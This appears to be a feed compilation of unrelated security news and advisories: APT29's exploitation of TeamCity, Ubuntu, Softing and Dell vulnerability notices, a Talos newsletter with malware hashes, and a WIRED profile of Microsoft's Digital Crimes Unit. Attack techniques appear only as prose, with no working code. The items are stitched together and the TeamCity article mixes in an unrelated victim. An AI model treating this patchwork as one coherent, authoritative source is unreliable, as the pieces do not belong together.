By Waqas
Polish authorities and FortiGuard Labs have issued a warning to customers about a new wave of cyberattacks associated with TeamCity.
This is a post from HackRead.com Read the original post: Russian APT29 Hacked US Biomedical Giant in TeamCity-Linked Breach

According to cybersecurity researchers at FortiGuard Labs, the Russian intelligence-linked APT29 group exploited a critical TeamCity vulnerability, which had initially been patched in September 2023.

Polish Military Counterintelligence Service (SKW) has released an advisory revealing that Russian Foreign Intelligence Service (SVR) affiliated threat actors are utilizing JetBrains CVE in global targeting. 

Here, it is worth noting that TeamCity and JetBrains are closely linked, with TeamCity being a continuous integration (CI) server developed and maintained by JetBrains.

As **reported by Hackread**.com, the vulnerability, which scored 9.8 by CVSS, was patched in September 2023. However, authorities particularly identified the notorious advanced persistent threat group called APT29, aka the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard, to be exploiting CVE-2023-42793.

The threat actor used Scheduled Tasks to execute GraphicalProton payloads, using rundll32 proxy execution as a defence evasion method. They also used legitimate third-party binaries vulnerable to search order hijacking.

“If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations” the **advisory** read.

SKW’s findings are supported by the FortiGuard Labs team of researchers. In their latest **blog post**, FortiGuard reports that APT29 has targeted a US-based biomedical manufacturing organization (_the name of which has not been shared with the media or public_) and revealed the threat actor’s TTPs. The report discusses the intrusion of this vulnerability found in TeamCity, a Windows server, by **APT29**.

Researchers noted that on 6 September 2023, Sonar’s cybersecurity experts discovered a critical TeamCity On-Premises vulnerability (tracked as **CVE-2023-42793**). This vulnerability was assigned a CVSS score of 9.8 due to its ability to be deployed without authentication. CISA added it to its ‘Known Exploited Vulnerabilities Catalog’ on October 4, 2023.

The FortiGuard Incident Response team reports that in October 2023, a US-based biomedical manufacturing organization was compromised due to this vulnerability exploited by APT29. The attack was initially exploited using a custom-built Python script, matching the GraphicalProton malware used by APT29. 

Analysis of application and system logs revealed evidence of successful exploitation, but some threat actors were unsuccessful at running **Linux system** commands on the victim Windows Server. APT29 likely employed Nuclei to identify potential victims and began executing additional discovery commands to gather system and privilege information.

The US-based tertiary education organization was targeted by APT29 with a C2 IP address discovered by the FortiGuard IR team. They discovered the organization’s infrastructure was compromised and identified an exploitation of their vulnerable TeamCity server. 

The threat actor used the TeamCity exploit to install an SSH certificate, which they used to maintain access to another victim’s environment. The actor downloaded a DLL file, ‘AclNumsInvertHost.dll,’ on the TeamCity host and used the TeamCity RCE vulnerability to create a Windows-scheduled task referencing the DLL file for persistence.

The screenshot shows the attack timeline of TeamCity intrusion (Credit: Fortinet Labs)

Despite a patch, the attacker persisted on the compromised host, leveraging their GraphicalProton implant. FortiGuard believes this attack was part of a **new APT29 campaign**. Significant OPSEC considerations included compromised infrastructure, search order hijacking with legitimate DLLs added, quality of masquerading, and single-use infrastructure components.

Researchers recommend containment and eradication actions, including blocking IP addresses, removing TeamCity software accounts, removing Windows accounts, removing backdoors, and removing malicious files dropped by threat actors to stay protected against threats like GraphicalProton.

****_RELATED ARTICLES_****

1.  **Russian Midnight Blizzard Hackers Hit MS Teams in Precision Attack**
2.  **Russian Hackers Employ Telekopye Toolkit in Broad Phishing Attacks**
3.  **Microsoft warns of rising NOBELIUM credential attacks on defence sector**
4.  **Microsoft Outlook Vulnerability Exploited by Russian Forest Blizzard Group**
5.  **Russia Hackers Abusing BRc4 Red Team Penetration Tool in Recent Attacks**

Russian APT29 Hacked US Biomedical Giant in TeamCity-Linked Breach

Temporary data passed between application components by Budgie Extras Windows Previews could potentially be viewed or manipulated. The data is stored in a location that is accessible to any user who has local access to the system. Attackers may read private information from windows, present false information to users, or deny access to the application.

14 December 2023

Several security issues were fixed in budgie-extras.

**Reduce your security exposure**

Ubuntu Pro provides ten-year security coverage to 25,000+ packages in Main and Universe repositories, and it is free for up to five machines.

Learn more about Ubuntu Pro

**Releases**

*   Ubuntu 23.10
*   Ubuntu 23.04
*   Ubuntu 22.04 LTS

**Packages**

*   budgie-extras - Applet to provide an alternative means to launch applications

**Details**

It was discovered that Budgie Extras incorrectly handled certain temporary file paths.  
An attacker could possibly use this issue to inject false information or deny  
access to the application. (CVE-2023-49342, CVE-2023-49343, CVE-2023-49347)

Matthias Gerstner discovered that Budgie Extras incorrectly handled certain  
temporary file paths. A local attacker could use this to inject arbitrary PNG  
data in this path and have it displayed on the victim's desktop or deny access  
to the application. (CVE-2023-49344)

Matthias Gerstner discovered that Budgie Extras incorrectly handled certain  
temporary file paths. A local attacker could use this to inject false information  
or deny access to the application. (CVE-2023-49345, CVE-2023-49346)

**Reduce your security exposure**

Ubuntu Pro provides ten-year security coverage to 25,000+ packages in Main and Universe repositories, and it is free for up to five machines.

Learn more about Ubuntu Pro

CVE-2023-49347: USN-6556-1: Budgie Extras vulnerabilities | Ubuntu security notices | Ubuntu

An uncaught exception issue discovered in Softing OPC UA C++ SDK before 6.30 for Windows operating system may cause the application to crash when the server wants to send an error packet, while socket is blocked on writing.

Publisher: Softing Industrial Automation GmbH

Document category: csaf\_security\_advisory

Initial release date: 2023-11-07T11:00:00.000Z

Engine: Secvisogram .2.2.15

Current release date: 2023-11-07T11:00:00.000Z

Build Date: 2023-11-22T07:46:18.833Z

Current version: 1.0.0

Status: final

CVSSv3.1 Base Score: 7.5

Severity: high

Original language: en-US

Language:

Also referred to:

**Vulnerabilities****(CVE-2023-41151)**

When the Server want to send an error packet, while socket is blocked on writing, the server may crash unexpectedly and must be restarted This issue only occurs on Windows operating system.

CWE:

CWE-248:Uncaught Exception

Discovery date:

2023-08-22T00:00:00.000Z

**Product status****Known affected**

Product

CVSS-Vector

CVSS Base Score

Softing OPC UA C++ SDK <= 6.20.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5

Softing Secure Integration Server <= V1.22

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5

Softing OPC Suite <= V5.30

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5

**Fixed**

*   Softing OPC UA C++ SDK V6.30
*   Softing Secure Integration Server V1.30

**Softing Industrial Automation GmbH**

Namespace: https://industrial.softing.com

Softing PSIRT - contact us at \[email protected\]

**Revision history**

Version

Date of the revision

Summary of the revision

1.0.0

2023-11-07T11:00:00.000Z

Initial version

**Disclaimer**

The information provided in this disclosure is provided "as is" without warranty of any kind. Softing disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Softing or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Softing or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-41151: SYT-2023-3: Uncaught exception vulnerability in OPC UA C++ SDK, Secure Integration Server and OPC Suite

Everyone's New Year's Resolution should be to stop using passwords altogether.

Thursday, December 14, 2023 14:00

As you’ve probably seen by now, Talos released our 2023 Year in Review report last week. It’s an extremely comprehensive look at the top threats, attacker trends and malware families from the past year with never-before-seen Cisco Talos telemetry. 

We have podcasts, long-form videos and even Reddit AMAs to keep you covered and make it easy to digest our major takeaways from the report. Or, just kick back with a cup of coffee and read the full report — your choice! 

With this being the last Threat Source newsletter of the calendar year, I figured I’d do a Year in Review of my own. I don’t have the data or first-hand research to back any of these statements up, this is purely just _vibes_\-based or things I’ve discovered about myself and my cybersecurity habits over the past year, so while you may not be able to deploy any of these things on your firewall, I hope they serve as good advice to anyone thinking about the security landscape heading into the new year. 

*   **Do as I say, not as I do.** Before my daughter was born, I wrote in this newsletter about how I was skeptical about posting her face online and entering her personal data into various platforms while she’s so young and unable to even understand what a phone is. As soon as she was old enough to smile, I folded quickly. I’ll admit that I’ve posted her face all over Instagram, supplied her information to Gerber to enter her into the annual Gerber Baby competition (she came up short behind Maddie, apparently) and given personal information to who knows what sites while I was randomly trying to get answers to my first-time parent questions at 2 a.m. when she was getting her first tooth. None of these things are particularly smart in the long run, but as an unbiased observer, I can confidently say her cuteness on the internet only makes it a better place. 
*   **Just assume your passwords are going to get out there.** Several major password management services were hit with data breaches this year. And there were countless headlines about how brute-forcing password guesses led to others. The basic idea of a password manager is that your login information is inherently safer than just using the same password repeatedly, writing them down on a physical sheet of paper, or just hoping you remember each time you log in. At this point, I think it’s just safe to say that passwords are not your safest option. Passkeys and a passwordless approach to security are becoming increasingly popular, so where you can enroll in that, do it. Or if a traditional username and password combination is your only option, change that password as often as you can and make sure you have multi-factor authentication enabled to whatever password management service you use.  
*   **It’s time to get off Twitter.** Or X, whatever you want to call it. This platform has fully jumped the shark at this point and is rife with misinformation. The company has completely torn down any internal teams it has dedicated to fighting fake news or scams and searching for literally anything will surface misleading information, outright lies or offensive content. I miss the days when I could go to Twitter and search for a topic to get updates on a particular news item. I’m writing this on Dec. 13, and in the “Trending” sidebar on Twitter, I saw that “#cyberattack” was trending. Naturally, I wanted to see if there was an event going on I should be aware of, for obvious reasons. Instead, my results in the “Top” section included some word salad about the Bank of England targeting its own country’s critical infrastructure, a nonsensical clip from commentator Dan Bongino about woke leftists showing a cyber pandemic in a new movie, and a shocking amount of conspiracy theories about said new movie “Leave the World Behind.” It reminds me of the Michael Bluth line from “Arrested Development” when he grabs the bag out of the fridge that says, “Dead Dove DO NOT EAT.” 
*   **Don’t ever assume a threat is gone forever.** Over the past year, many major threat actors and malware operators that were once thought removed showed they could find a way back. The story of the FBI’s takedown of the Qakbot botnet was a major headline in August, and anyone who read the basic coverage would have thought, “Cool, don’t need to worry about those guys anymore!” However, subsequent research from Talos and other security firms found that remnants of Qakbot are still around, specifically services dedicated to sending spam. Trickbot, a major threat actor known for big game hunting, recently switched up its tactics and is actively targeting organizations in Ukraine, despite its developer being arrested and pleading guilty to several U.S. federal charges. And Emotet, which is known for its various stops-and-starts, is relatively quiet right now but was briefly active again earlier this year. This is not to say that these law enforcement server takedowns and arrests aren’t working — anything we can do to make the bad guys’ lives harder is a win in the end — but it’s continued proof that we can never really count any threat out.  

**The one big thing **

Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. Our latest findings indicate a definitive shift in the tactics of the infamous North Korean state-sponsored actor. 

**Why do I care? **

This particular activity can be attributed to Andariel, a spinoff of the Lazarus Group. They’re actively exploiting the Log4shell vulnerability in Log4j, which is virtually everywhere. The hope is that most people have patched since the ubiquitous vulnerability was discovered in late 2021, but telemetry indicates there are many vulnerable instances still out there. Once infected, Andariel looks to install other malware loaders on the targeted machines and executes remote code that allows them to learn about the details of the system.  

**So now what? **

Talos’ blog outlines the numerous ways Cisco Secure products have protections in place to defend against Operation Blacksmith and other activities from Lazarus Group. 

**Top security headlines of the week **

**Hundreds of Windows and Linux devices from a range of manufacturers are vulnerable to a newly discovered attack called “LogoFAIL.”** The attack involves an adversary executing malicious firmware during the machines’ boot-up sequences, which means it’s difficult for traditional detection methods to block, or for users to even notice that it’s happening. The researchers who discovered this exploit wrote in their full paper that, once the attacker uses LogoFAIL to execute remote code during the Driver Execution Environment phase, it’s “game over for platform security.” Although there is no indication this type of attack has been used in the wild, it is being tracked through several CVEs. Potentially affected users should update to the latest version of UEFI by updating their firmware, including new patches from AMI, Intel, Insyde, Phoenix and Lenovo. Users can also lock down their machine’s EFI System Partition (ESP) so adversaries can’t access it, which is necessary to carry out LogoFAIL. (ArsTechnica, ZDNet) 

**The U.K. publicly charges Russia’s intelligence agency, the FSB, of a yearslong cyber espionage campaign targeting British government officials and other high-profile public citizens.** The U.K. Foreign Office said the FSB conducted "sustained unsuccessful attempts to interfere in U.K. political processes” over several years, including stealing information relating to the country’s national elections in 2019. The alleged campaigns involved trying to breach emails belonging to politicians, journalists, activists and academics, and fake social media profiles set up to impersonate the target’s contacts. One MP in British parliament said their emails had been stolen. Several individuals belonging to a group known as Star Blizzard have been sanctioned for their connections to these activities. (BBC, Politico) 

**Several major hardware and software vendors released their last patches of the calendar year this week.** Microsoft disclosed four critical vulnerabilities as part of its regular Patch Tuesday, three of which could lead to remote code execution. However, the total number of vulnerabilities included in December’s Patch Tuesday, 33, was the lowest in a single month since December 2019. Meanwhile on Monday, Apple released patches for its major pieces of hardware, disclosing security issues in iPhones, Macs and more. One of the vulnerabilities in macOS, CVE-2023-42914, is a kernel issue with the potential to allow apps to break out of their sandboxes. Additionally, the U.S. Cybersecurity and Infrastructure Security Agency released an advisory that attackers are actively exploiting a vulnerability in Adobe ColdFusion, which potentially poses a threat to government agencies. CVE-2023-26360 is an improper access control issue that could lead to arbitrary code execution. (Dark Reading, Talos, Security Boulevard) 

**Can’t get enough Talos? **

*   Network Infrastructure Is A Prime Target For Cyber Threats 
*   North Korean hackers using Log4J vulnerability in global campaign 
*   Video: Talos 2023 Year in Review highlights 
*   CCQ explores cybersecurity strategies for managing and responding to industrial incidents 
*   CW39 Houston: Protect Yourself from Cyber Attack 
*   Lazarus exploit Log4Shell vulnerability to deliver novel RAT malware 

**Upcoming events where you can find Talos **

**NIS2 Directive: Why Organizations Must Act Now to Ensure Compliance and Security** **(Jan. 11, 2024, 10 a.m. GMT)** 

Virtual 

> _The NIS2 Directive is a crucial step toward securing Europe’s critical infrastructure and essential services in an increasingly interconnected world. Organizations must act now to prepare for the new requirements, safeguard their operations, and maintain a robust cybersecurity posture. Gergana Karadzhova-Dangela from Cisco Talos Incident Response and other Cisco experts will talk about how organizations can best prepare for the coming regulations._  

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725   
**MD5:** d47fa115154927113b05bd3c8a308201    
**Typical Filename:** mssqlsrv.exe   
**Claimed Product:** N/A     
**Detection Name:** Trojan.GenericKD.65065311 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd  

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** 5a6b089b1d2dd66948f24ed2d9464ce61942c19e98922dd77d36427f6cded634   
**MD5:** 05436c22388ae10b4023b8b721729a33   
**Typical Filename:** BossMaster.txt   
**Claimed Product:** N/A   
**Detection Name:** PS1.malware.to.talos 

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa   
**MD5:** 9403425a34e0c78a919681a09e5c16da   
**Typical Filename:** vincpsarzh.exe   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

A personal Year in Review to round out 2023

Ten years in, Microsoft’s DCU has honed its strategy of using both unique legal tactics and the company’s technical reach to disrupt global cybercrime and state-backed actors.

Governments and the tech industry around the world have been scrambling in recent years to curb the rise of online scamming and cybercrime. Yet even with progress on digital defenses, enforcement, and deterrence, the ransomware attacks, business email compromises, and malware infections keep on coming. Over the past decade, Microsoft's Digital Crimes Unit (DCU) has forged its own strategies, both technical and legal, to investigate scams, take down criminal infrastructure, and block malicious traffic.

The DCU is fueled, of course, by Microsoft's massive scale and the visibility across the internet that comes from the reach of Windows. But DCU team members repeatedly told WIRED that their work is motivated by very personal goals of protecting victims rather than a broad policy agenda or corporate mandate.

In just its latest action, the DCU announced Wednesday evening efforts to disrupt a cybercrime group that Microsoft calls Storm-1152. A middleman in the criminal ecosystem, Storm-1152 sells software services and tools like identity verification bypass mechanisms to other cybercriminals. The group has grown into the number one creator and vendor of fake Microsoft accounts—creating roughly 750 million scam accounts that the actor has sold for millions of dollars.

The DCU used legal techniques it has honed over many years related to protecting intellectual property to move against Storm-1152. The team obtained a court order from the Southern District of New York on December 7 to seize some of the criminal group’s digital infrastructure in the US and take down websites including the services 1stCAPTCHA, AnyCAPTCHA, and NoneCAPTCHA, as well as a site that sold fake Outlook accounts called Hotmailbox.me.

The strategy reflects the DCU’s evolution. A group with the name “Digital Crimes Unit” has existed at Microsoft since 2008, but the team in its current form took shape in 2013 when the old DCU merged with a Microsoft team known as the Intellectual Property Crimes Unit.

“Things have become a lot more complex,” says Peter Anaman, a DCU principal investigator. “Traditionally you would find one or two people working together. Now, when you’re looking at an attack, there are multiple players. But if we can break it down and understand the different layers that are involved it will help us be more impactful.”

The DCU’s hybrid technical and legal approach to chipping away at cybercrime is still unusual, but as the cybercriminal ecosystem has evolved—alongside its overlaps with state-backed hacking campaigns—the idea of employing creative legal strategies in cyberspace has become more mainstream. In recent years, for example, Meta-owned WhatsApp and Apple both took on the notorious spyware maker NSO Group with lawsuits.

Still, the DCU's particular progression was the result of Microsoft's unique dominance during the rise of the consumer internet. As the group's mission came into focus while dealing with threats from the late 2000s and early 2010s—like the widespread Conficker worm—the DCU's unorthodox and aggressive approach drew criticism at times for its fallout and potential impacts on legitimate businesses and websites.

“There's simply no other company that takes such a direct approach to taking on scammers,” WIRED wrote in a story about the DCU from October 2014. “That makes Microsoft rather effective, but also a little bit scary, observers say.”

Richard Boscovich, the DCU’s assistant general counsel and a former assistant US attorney in Florida’s Southern District, told WIRED in 2014 that it was frustrating for people within Microsoft to see malware like Conficker rampage across the web and feel like the company could improve the defenses of its products, but not do anything to directly deal with the actors behind the crimes. That dilemma spurred the DCU’s innovations and continues to do so.

“What’s impacting people? That’s what we get asked to take on, and we’ve developed a muscle to change and to take on new types of crime,” says Zoe Krumm, the DCU’s director of analytics. In the mid-2000s, Krumm says, Brad Smith, now Microsoft’s vice chair and president, was a driving force in turning the company’s attention toward the threat of email spam.

“The DCU has always been a bit of an incubation team. I remember all of a sudden, it was like, ‘We have to do something about spam.’ Brad comes to the team and he’s like, ‘OK, guys, let’s put together a strategy.’ I’ll never forget that it was just, ‘Now we’re going to focus here.’ And that has continued, whether it be moving into the malware space, whether it be tech support fraud, online child exploitation, business email compromise.”

As the group has matured and expanded into all of these areas, Boscovich says, a “preoccupation with exposure to liability and risk” is another element of the work that keeps him up at night.

“You want to help, and you want to do all these things, but no good deed goes unpunished sometimes,” he says. “Sometimes, we would try to help someone—and to help them you kind of shut their computer down—and even though you’re trying to help them, their small business goes down. So how do you manage that? That’s always been the hardest part of my job. The legal creativity is cool, but how do I make sure that it’s acceptable risk and that we research everything so there’s no collateral damage?”

The legal strategies the group has focused on developing evolve as digital threats evolve. In 2016, the DCU began taking the approach of establishing a court “special master” when working on disruptions related to state-sponsored hacking. This judge-appointed official is a direct point of contact for ongoing cases and even remains active for years after a case has been officially closed, enabling the DCU to get court approval for infrastructure takedowns and other actions without having to file for new court orders.

“It allows us to stay on top of these threats and get an order within minutes,” Boscovich says. “We can accelerate the process of litigation almost to the speed of cyber.”

He also points out the challenge of taking action against threat actors given the professionalization of the cybercriminal ecosystem in recent years. Crime groups now operate as syndicates with different departments working on different aspects of carrying out crimes while also contracting with third parties for services they don't develop in-house.

“There’s a legal problem: How do you get a bunch of people doing separate activities into one complaint or one charge? They don’t always even know each other,” Boscovich says. To address this situation, the group worked on legal strategies under the US Racketeer Influenced and Corrupt Organizations Act (RICO), which is designed to focus on criminal organizations rather than individual criminal acts.

“These are the guys who developed the malware, brokered the malware, operate the malware, so we can put them all into one legal filing to bring them together,” he says. “Now that has become part of our legal game plan as well.”

As cybercriminal and state-backed hacking has continued to escalate, the DCU has expanded its collaborations with law enforcement and used its techniques during an ever-changing array of global crises. In 2016, for example, the group carried out its first disruption of a state actor, conducting takedowns related to Russia’s APT 28, known as Fancy Bear. The attackers had been using Microsoft-like domains in their notorious phishing rampages and disinformation campaigns related to that year’s US elections. In 2018, the group shared findings with the Delhi police about the actors behind 10 criminal call centers in India who were scamming victims in the US, Canada, the Netherlands, and Australia. The information-sharing resulted in 63 arrests. In 2020, the DCU seized domains used in pandemic-related cybercrime and also conducted takedowns against the notorious Trickbot ransomware group ahead of the 2020 US elections.

“We tend to think about it from the victim protection perspective,” says Amy Hogan-Burney, who oversees the DCU as Microsoft's general manager and associate general counsel of cybersecurity policy and protection. “I leave deterrence generally to governments, but what I always focus on is victim protection. That can be narrow, meaning a Microsoft customer or type of Microsoft customer, or it can be really broad—anyone who is using the internet who may be impacted by cybercrime.”

Microsoft’s Digital Crime Unit Goes Deep on How It Disrupts Cybercrime


Dell vApp Manger, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote attacker could potentially exploit this vulnerability to read arbitrary files from the target system.



**Article Content**

**Impact**

High

**Details**

**Third-Party Component**

**CVEs**

**More Information**

SOCKS5

CVE-2023-38545

See NVD link below for individual scores for each CVE.  
https://nvd.nist.gov/vuln/detail/CVE-2023-38545

SLES 12 SP5

CVE-2016-3709, CVE-2018-7738, CVE-2018-9234, CVE-2020-22218, CVE-2020-36766, CVE-2022-36402, CVE-2022-40982, CVE-2022-48565, CVE-2022-48566, CVE-2023-0394, CVE-2023-0459, CVE-2023-1192, CVE-2023-1206, CVE-2023-1859, CVE-2023-1981, CVE-2023-2007, CVE-2023-20197, CVE-2023-20569, CVE-2023-20588, CVE-2023-20593, CVE-2023-28484, CVE-2023-28736, CVE-2023-28938, CVE-2023-29469, CVE-2023-2985, CVE-2023-32182, CVE-2023-32360, CVE-2023-3341, CVE-2023-34241, CVE-2023-34319, CVE-2023-3446, CVE-2023-34969, CVE-2023-35001, CVE-2023-3567, CVE-2023-35945, CVE-2023-36054, CVE-2023-3609, CVE-2023-3611, CVE-2023-3772, CVE-2023-3776, CVE-2023-3812, CVE-2023-3817, CVE-2023-38408, CVE-2023-38559, CVE-2023-3863, CVE-2023-39192, CVE-2023-39193, CVE-2023-39194, CVE-2023-39615, CVE-2023-4016, CVE-2023-40217, CVE-2023-40283, CVE-2023-4128, CVE-2023-4132, CVE-2023-4133, CVE-2023-4134, CVE-2023-4156, CVE-2023-4194, CVE-2023-42754, CVE-2023-43115, CVE-2023-43785, CVE-2023-43786, CVE-2023-43787, CVE-2023-4385, CVE-2023-4387, CVE-2023-4459, CVE-2023-4504, CVE-2023-4622, CVE-2023-4623, CVE-2023-4641, CVE-2023-4692, CVE-2023-4693, CVE-2023-4881, CVE-2023-4921

See NVD link below for individual scores for each CVE.  
http://nvd.nist.gov/

Oracle

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025

See NVD link below for individual scores for each CVE.  
http://nvd.nist.gov/

Windows 10

CVE-2023-36724, CVE-2023-36434, CVE-2023-36576, CVE-2023-36598, CVE-2023-36731, CVE-2023-36557, CVE-2023-36563, CVE-2023-36721, CVE-2023-44487, CVE-2023-36602, CVE-2023-36725, CVE-2023-36436, CVE-2023-36438, CVE-2023-36720, CVE-2023-36431, CVE-2023-36570, CVE-2023-36722, CVE-2023-36723, CVE-2023-36726, CVE-2023-36732, CVE-2023-41773, CVE-2023-41772, CVE-2023-41771, CVE-2023-41770, CVE-2023-41768, CVE-2023-41767, CVE-2023-36743, CVE-2023-36776, CVE-2023-38166, CVE-2023-36902, CVE-2023-35349, CVE-2023-36564, CVE-2023-36567, CVE-2023-36571, CVE-2023-36572, CVE-2023-36573, CVE-2023-36574, CVE-2023-36575, CVE-2023-36577, CVE-2023-36578, CVE-2023-36579, CVE-2023-36581, CVE-2023-36582, CVE-2023-36583, CVE-2023-36584, CVE-2023-36585, CVE-2023-36589, CVE-2023-36590, CVE-2023-36591, CVE-2023-36592, CVE-2023-36593, CVE-2023-36594, CVE-2023-36596, CVE-2023-36603, CVE-2023-36605, CVE-2023-36606, CVE-2023-36697, CVE-2023-36698, CVE-2023-36701, CVE-2023-36702, CVE-2023-36704, CVE-2023-36709, CVE-2023-36710, CVE-2023-36711, CVE-2023-36712, CVE-2023-36713, CVE-2023-36729, CVE-2023-41774, CVE-2023-41769, CVE-2023-41766, CVE-2023-41765, CVE-2023-38159, CVE-2023-36794, CVE-2023-36792, CVE-2023-36796, CVE-2023-36788, CVE-2023-36793, CVE-2023-36803, CVE-2023-38142, CVE-2023-38160, CVE-2023-38161, CVE-2023-36802, CVE-2023-36804, CVE-2023-36805, CVE-2023-38139, CVE-2023-38140, CVE-2023-38141, CVE-2023-38143, CVE-2023-38144, CVE-2023-38147, CVE-2023-38149, CVE-2023-35355, CVE-2023-36899, CVE-2023-36873, CVE-2023-38172, CVE-2023-38184, CVE-2023-35387, CVE-2023-35386, CVE-2023-35385, CVE-2023-35384, CVE-2023-35383, CVE-2023-35380, CVE-2023-35378, CVE-2023-35377, CVE-2023-38254, CVE-2023-36913, CVE-2023-36911, CVE-2023-36907, CVE-2023-36889

See NVD link below for individual scores for each CVE.  
http://nvd.nist.gov/

Dell Technologies recommends all customers consider both the CVSS base score and any relevant temporal and environmental scores that may impact the potential severity associated with a particular security vulnerability.

**Affected Products and Remediation**

**CVEs Addressed**

**Product**

**Software/Firmware**

**Affected Versions**

**Remediated Versions**

**Link**

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025

Unisphere for PowerMax

Host Installation

Versions prior to 9.2.4.7

Version 9.2.4.7

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025, CVE-2023-38545, CVE-2023-48660, CVE-2023-48661, CVE-2023-48662, CVE-2023-48663, CVE-2023-48664, CVE-2023-48665, CVE-2023-48671

Unisphere for PowerMax Virtual Appliance

Virtual Appliance

Versions prior to 9.2.4.7

Version 9.2.4.7

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025

Unisphere 360

Host Installation

Versions prior to 9.2.4.11

Version 9.2.4.11

https://www.dell.com/support/home/product-support/product/unisphere-360/drivers

CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025, CVE-2023-38545, CVE-2023-48660, CVE-2023-48661, CVE-2023-48662, CVE-2023-48663, CVE-2023-48664, CVE-2023-48665, CVE-2023-48671

Solutions Enabler Virtual Appliance

Virtual Appliance

Versions prior to 9.2.4.5

Version 9.2.4.5

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

CVE-2016-3709, CVE-2018-7738, CVE-2018-9234, CVE-2020-22218, CVE-2020-36766, CVE-2022-36402, CVE-2022-40982, CVE-2022-48565, CVE-2022-48566, CVE-2023-0394, CVE-2023-0459, CVE-2023-1192, CVE-2023-1206, CVE-2023-1859, CVE-2023-1981, CVE-2023-2007, CVE-2023-20197, CVE-2023-20569, CVE-2023-20588, CVE-2023-20593, CVE-2023-28484, CVE-2023-28736, CVE-2023-28938, CVE-2023-29469, CVE-2023-2985, CVE-2023-32182, CVE-2023-32360, CVE-2023-3341, CVE-2023-34241, CVE-2023-34319, CVE-2023-3446, CVE-2023-34969, CVE-2023-35001, CVE-2023-3567, CVE-2023-35945, CVE-2023-36054, CVE-2023-3609, CVE-2023-3611, CVE-2023-3772, CVE-2023-3776, CVE-2023-3812, CVE-2023-3817, CVE-2023-38408, CVE-2023-38559, CVE-2023-3863, CVE-2023-39192, CVE-2023-39193, CVE-2023-39194, CVE-2023-39615, CVE-2023-4016, CVE-2023-40217, CVE-2023-40283, CVE-2023-4128, CVE-2023-4132, CVE-2023-4133, CVE-2023-4134, CVE-2023-4156, CVE-2023-4194, CVE-2023-42754, CVE-2023-43115, CVE-2023-43785, CVE-2023-43786, CVE-2023-43787, CVE-2023-4385, CVE-2023-4387, CVE-2023-4459, CVE-2023-4504, CVE-2023-4622, CVE-2023-4623, CVE-2023-4641, CVE-2023-4692, CVE-2023-4693, CVE-2023-4881, CVE-2023-4921, CVE-2023-30589, CVE-2023-22067, CVE-2023-22081, CVE-2023-22091, CVE-2023-22025, CVE-2023-38545, CVE-2023-48660, CVE-2023-48661, CVE-2023-48662, CVE-2023-48663, CVE-2023-48664, CVE-2023-48665, CVE-2023-48671

Dell PowerMax EEM

Embedded Management

Version 5978

Version 5978.714.714 Patch 10120

Contact customer support and request DSA-2023-443  
https://www.dell.com/support/incidents-online

